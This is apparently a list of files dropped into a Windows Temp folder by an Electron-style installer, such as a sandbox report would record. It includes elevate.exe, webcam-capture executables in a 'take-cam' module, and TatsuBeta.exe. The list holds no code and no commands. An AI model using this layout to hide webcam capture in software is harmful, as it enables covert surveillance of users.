C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\sr.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\sl.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\sk.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\sv.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\sw.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ru.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\vi.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\uk.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\tr.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\zh-CN.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\th.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\ta.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\te.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\locales\zh-TW.pak

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\app.asar

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\elevate.exe

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\snapshot.exe

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\prey-webcam.exe

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\package.json

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\resources\app.asar.unpacked\node_modules\take-cam\DirectShowLib-2005.dll

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\swiftshader\libGLESv2.dll

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\7z-out\swiftshader\libEGL.dll

C:\Users\Admin\AppData\Local\Temp\nst5FFC.tmp\StdUtils.dll

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\ffmpeg.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\TatsuBeta.exe

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\icudtl.dat

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources\app.asar

\Users\Admin\AppData\Local\Temp\18078ff1-2bd6-42b5-be14-49e4f3753898.tmp.node

\Users\Admin\AppData\Local\Temp\50b193d3-c9de-44c5-aac1-48207281878e.tmp.node

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\resources.pak

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\d3dcompiler_47.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\D3DCompiler_47.dll

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libEGL.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libegl.dll

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libGLESv2.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\libglesv2.dll

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vulkan-1.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vulkan-1.dll

\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vk_swiftshader.dll

C:\Users\Admin\AppData\Local\Temp\2ZdG8X2gWoTdtwlDbFyg86mVpDI\vk_swiftshader.dll
